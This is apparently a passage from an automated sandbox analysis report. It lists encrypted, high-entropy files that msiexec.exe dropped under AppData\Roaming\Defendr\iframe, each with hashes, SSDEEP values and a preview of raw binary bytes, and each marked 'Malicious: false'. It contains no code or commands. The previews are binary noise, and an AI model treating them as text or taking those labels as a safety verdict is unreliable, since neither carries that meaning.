SHA-512:	B5D0AC28F90B07F4C02CC1CE80351970767E77962C1E6065240D3224E9AA42F7DD8BC016029459E3837912BEDD40DF63A1A5513E17BC45DF1F9AACE133F2F7F2
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv12.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	89867
Entropy (8bit):	7.997920440624809
Encrypted:	true
SSDEEP:	1536:BW6/ECkXeC2oyI7arfNZ9kst46VHoxTlC3Vvz+/1ELZiK5Y1NvJMFF7JLwqyrnVQ:ocrkos7Wpt46VHoxTcVq/1ELZikUvJMr
MD5:	5056454E25D9DA771B1927ED97BFAF0D
SHA1:	1A7E91BE971E815071A58C54BA57B9FB613DFDDB
SHA-256:	EDCAF92F597D225DB49C4DF56300BF4962177B689409758571790DAF262575CA
SHA-512:	67A0322E0E9C1C6D06235C43C57BB85BCB20156B292989A963D598D4801B36AF9A255427D6A3891347BAB88614FD1E1556C44FD143D2D7131A713C025ED8E202
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv12.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	30981
Entropy (8bit):	7.994864854434588
Encrypted:	true
SSDEEP:	768:BW6NgZIbV8Eyzb56mJ/dc7F1Jc+rtiStdtL:BW6m+xVyn5lldSF1JpDtL
MD5:	56D17C7CB534DD8290971648EAEF4B84
SHA1:	AA757929675926B17D02078C69F0F3B4972C6E18
SHA-256:	7860C45AB4056B141C9031E95F2E93E852531D1AA03B4E5FD6164C6C4E812C64
SHA-512:	6340A31150A45DEA1E367319F18BD2FE6C6BEB7CB975638935B28D95514091BF6E48DB8B8E9060F96A621BC00EF5F57237BD0F13549EFA0024298CF069A02D0F
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv13.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	100846
Entropy (8bit):	7.998158896251984
Encrypted:	true
SSDEEP:	3072:odWE3d6L0GenMnlMkDVZI8+NOqKzazG5zsPfeT5yw:YVrhA1DVZIhkN1zseTx
MD5:	91EC970B7C15E11680F47A1413B72962
SHA1:	339B0A308CD1F5B4174F7F43999A4281C205503B
SHA-256:	6BF4C19E221830BD5BABCAC9F92089A656882E3793FC69879D804788960FD223
SHA-512:	4226E840940163B0525EEAA9D372C8247F9CBC2D84068E0EFB9A01D2D8B118D50C9351BF077F5C865BD3A9359F560792A3483933806583602CFA79731E118834
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv13.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	33480
Entropy (8bit):	7.995378671824126
Encrypted:	true
SSDEEP:	768:BW6N286l4XkLghjeSo6+pEVf4J1wAJ/G7mRlgW6WsvV0YYQ:BW6zhilLD11e7fWBsvVpYQ
MD5:	76865ECCE4C30C2536236ED171A0D76E
SHA1:	B5E5C62D55D317D1D7F77915C5738A8635C82C9C
SHA-256:	C7B799B3DEE229B709AD9DAE5E029FA5A7D7BE8BE0454F49527B632C07D9F625
SHA-512:	B585721BE72E8BE50CB13C2EB0F3A80AA85A17FC49C542E95BFBFCBC898F09E6BC370388FB583F1CC2D216A37834CC3F7C7BEBFACE45F68F037133ACE812A90D
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv14.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	101922
Entropy (8bit):	7.997980089704199
Encrypted:	true
SSDEEP:	3072:ozGLP4gGk7MqyFe+v5FSXq8vymH3AhLBvVu53s:c2Mqy00FSVbXAhK53s
MD5:	3D8772A6F26F6BAAD2715A514D7A419D
SHA1:	5062988072F8CC660EAD6BB5BC7767EBD68705E3
SHA-256:	8FA4E1AF5CBF40A9A52A718BD43EF4C089632E732B1EAC5299E73994E947B219
SHA-512:	C96969F7A0F509B39DF3378600A1F83AA1E72B62FD2CA7AB23880A10A60D1D05D368500E385E31EFDA7D6B21E4F038F0F55AB88AD8ABD4966568F0DA78711BCD
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv14.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	34450
Entropy (8bit):	7.993568193715657
Encrypted:	true
SSDEEP:	768:BW6NxQk/u3KCN5PkV12Ms5n9wclxmgWwiApAQAgnus5lUZgsqK:BW6sk/uNN5Pkf2fnnNi0FAgnusrmSK
MD5:	20354B294A886DE9EED65C05B8B4E0EA
SHA1:	FDB0C9C8E67DC389C3D33BFEAA45B11EADE89B37
SHA-256:	3B01077CB6F2B33E1FD4B44D6F8FCB2144840AB59E819665B331CBB753E1DD1D
SHA-512:	6AFC0716FD5CA327A20E1B91138D7840F741943552C72D4BED4F91D97E685F245D3085848C548A0875455C54646A95B085C49737A8820F71C4D2AF87519C760A
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv15.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	94880
Entropy (8bit):	7.998273684433496
Encrypted:	true
SSDEEP:	1536:BW6ki9VOORyBJuKi8oWqJB9DTEhIr9i854OjWihTenAmM6EUKUT+hH9FtqsaQD1:oq9VOTBJuKi8oWqJB9DTECQ9OjWihgwL
MD5:	D7901A0FB829DB040107D2C02943A4D6
SHA1:	18A852B5DA7A2B57A6154C83C80F62ED67570791
SHA-256:	E2F925AA3AF7174F26E96571038AB83FC1D1D8F4F5A2EB1C48C654EDA1E6A2D1
SHA-512:	BE831DCD06567A2F9A23988086BEB16880847879626ACE28208F0BF2EC99883C26C326F708D6BDDFB5BD97D476AE119135682B2FC9571B990376B74260CD0725
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv15.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	34480
Entropy (8bit):	7.9953759299235685
Encrypted:	true
SSDEEP:	768:BW6Naojf7WVL3er0d3esbt78wNXg6w1E0xLmPSpJW5aBG:BW6wojDM3er0dRuaQ9XbDG
MD5:	490064B278F31F395A1D93488FE7417C
SHA1:	85F0BAEABE880AEC6324E2D994BAA37235C8F260
SHA-256:	30DEFE60FF9390B8B828759FBF90B152A8F8BE7423258897E31712E27AA18463
SHA-512:	A0001C53159AD3A033D53FCC86A7DF622C4313938674DBE58951915D212058829C031EBE7AAAFE06EE998A4037FBADE880FAA9957EEE6F6AC4CED272D7162971
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv16.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	97471
Entropy (8bit):	7.997963841827689
Encrypted:	true
SSDEEP:	1536:BW6XaXXzu+S2cEfzIaUU4EHvAQq5xoJOzift1Y//H7PzqmsKW+pQEtrJookIbC:oLu+SPKES4EHvA15OEuf2Dns4pQEYok3
MD5:	7E93CE1B4A288A0764CAB1A866932F7D
SHA1:	1EEE7FCFA3EDACB29875BCA791855FE5327ECA0B
SHA-256:	F6D10BF1489717408DC6F215A3996AE1C666D50FEC1AB4D80D84C0BF0D8F28A6
SHA-512:	7BC1C0130184686025A6E367E56C74848778C27C166A815FE25D410D1C2B1F75616DB95E6596072242B0C3CF431938E4D339292DEA515D3214D6CC8C9A1A87A6
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv16.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	37147
Entropy (8bit):	7.994941099826608
Encrypted:	true
SSDEEP:	768:BW6NWTnwyRRds+R5aAqqp7E0m5CZkpmyWj8AQtOjY/Eob0xqucr0ULBnT:BW6unx/6+R59qqn9tj8AQoY/EdAhr0QT
MD5:	3E9FF1A1C7D11B406196267E0C1FE54B
SHA1:	539E9238F09C47E907E428B3F9C993A74E3A89F2
SHA-256:	B87FD006B7A4B7CA41B0C0C836636CDC46A1B87AB8BB0C17C0380FA42BC40E05
SHA-512:	D3071B70A00F40927EF048DE939E35BD22234F41CF6069196DF967326835EED9FFD77F5964008EE3906A439DEE7FEE9C0E6A1C6061D1332BC1C32A6B592AEA3E
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv17.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	108523
Entropy (8bit):	7.998242819406155
Encrypted:	true
SSDEEP:	3072:onFeB6AcOWd374OzOHlh6Hy00+GJTNo/y:4STDvMChJBOy
MD5:	B954EE1D0DDBD6917660F9C3BD90703A
SHA1:	D21DFBB906266FCB3569968A706DAEE6BC399176
SHA-256:	AA5EFEE8E48E66DDF491A2F253ABE81E304E36A8F9A2A45B54F0C7F415D70582
SHA-512:	70E00C351D8AC5215C4865C6ED196008D6267CF0CFA463524814B6761E807A6A07850749334594E13F98FD6D2A8706DA7EFCEE6421A49CA699234F9770D38856
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv17.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	41834
Entropy (8bit):	7.995867858033007
Encrypted:	true
SSDEEP:	768:BW6NwIdvCYp/JggXqA+ymRuElNDsCDD7KZblz1rs:BW6a+CKJgbru8XDD7KLzW
MD5:	199C9F4ACDC95653F0741CD7BBED72E7
SHA1:	872E1E241DA7FAB037DB2C8C855B02C25CF29C94
SHA-256:	E77435E9B11AE1A2A014EE878F069BDD9198ED746CBACA50AD334020125858EC
SHA-512:	4C458E9E6B8C10EBE868BF6FA8CF62EB8F8EB8BE664BC9F2DEB61E5AE371891BB6554407D6DE158796420F7EC67A24E05D244E181D64835922586511BA81C2F3
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv18.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	91207
Entropy (8bit):	7.998041486799748
Encrypted:	true
SSDEEP:	1536:AohPjAwtlx9NE0xivxzsyvfVZq2vJbKRypOHsDEO1TDnjsX12j:A+PsWl7NhCWy1BqMDJ1noXsj
MD5:	55023E704F32EB3F068C673D0FEA18CB
SHA1:	D20D01F61ACA12CB38E9C62737A895FFDDCF6A4E
SHA-256:	96C294875C7A8068301FB076CFC5DEFD26DF7B47AD875F6804886D0E374DD725
SHA-512:	1D8E2326C19FC3818AB0860ED0665F870550CD6E83DDE9856A344407484FFDA919E8FF63549F0EFDF1D0BCA2ADAA5E86A3D70735C52767E860DE191D391DBE19
Malicious:	false
Preview:	.#D...e..,...!G...A..Z\.Zs..s.....n...H.n..]...f..7Zc..\|..9."....V.<{%....x......J....l...u..a...lt49O.B8.k. .Y.&\..P..b..V..!..!"..f..5......F/n..<q.l....y:..t.qc...ng.,..............8."....7.H...B....i..V........m4..C!.\|-[.J<.f...#p.rTW.....N.t......GbT...Tc.Vk..`.....+........m.VM3....Ij.,.{e..)0.l..\9.....Z.`.....u.........-v.k.Cc.a.p.....SZ8.....= ..:..<.NO....;.0i.A~.C....[V..\|0.m#R.k.8..D....m..(Gk...,...'.nY4~..+z.......<ih..C....C.u.;&.00"....w...4..d.!f..._..Y+!0......u.\|.S.....9.......e=[....s....U..@.A...q.*.k1...b,p@..L..O.....O^>.AC...4zu...c:..6.....U%:_.b\/.....>.l..T.w..~.....`...E.J...`.}.`..wt_qQ..T/.a......Fl6..MV.U.5f#C.......`.E%.l......W....RB+.>+%.2/t.+.f....x....A...b.A....?7.....2............U.RD...\I..Vga...}...JF%....hN=...;........?....n:$...$S.P............{....F8..#...f...3.:Gc.X.....bg..b.ZL.....= 9.1p.)...d..W.Hq}.FmxP.s.t.....7......bkr.P.....O...W....:,...t...&.+..i.,/..w...d.......!..{/..Q.Q...._

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv18.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	70067
Entropy (8bit):	7.997558546255013
Encrypted:	true
SSDEEP:	1536:LEdkDhpUE4wxgU8wrLdymUCTWUMcLYJ5npJ:Yulp8wFgmUCKPcL8P
MD5:	26E1D8BF489FA30F98149CF812E0A1D2
SHA1:	3C063A89D5D9E18CAF21E35C398FD50E09D9426A
SHA-256:	340B5EA15AAC2496C69567327F34EB33E1AF6FC4BD8201B81E32A3816B475826
SHA-512:	BACB0C82B889AFC2DDC001D38CEAE7067204802F03A4AB7818888509007B1E70028BFC5A9C1C3C657C56BD6E0CE12DA7EE306B21D277D6B83F4FA05A93829963
Malicious:	false
